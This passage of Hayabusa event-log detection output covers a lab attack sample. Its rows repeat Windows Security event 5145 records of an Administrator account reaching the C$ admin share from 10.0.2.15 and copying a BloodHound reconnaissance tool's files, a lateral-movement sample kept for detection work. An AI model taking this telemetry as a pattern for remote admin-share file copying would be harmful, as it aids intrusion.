Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 